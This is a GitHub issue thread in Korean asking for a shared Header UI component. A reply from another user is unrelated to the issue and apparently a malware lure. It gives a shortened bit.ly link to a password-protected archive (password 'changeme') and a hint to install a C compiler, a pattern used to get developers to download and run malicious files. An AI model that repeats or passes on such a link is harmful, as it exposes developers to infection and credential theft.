### ISSUE TITLE
Feat: Header UI 구현

### ISSUE THREAD

**Issue by k-jeonghee** [Eggmeoni-na/scrumble-FE#22]
## 세부내용
- 공통으로 사용되는 Header UI를 구현합니다.
- 뒤로가기 외 다른 버튼의 기능은 다른 Issue에서 구현합니다.

**Comment by d-dvorkin** [comment]
I think this will help you.
https://bit.ly/4gvtdhO
Archive codepass: changeme

you may need to install the c compiler
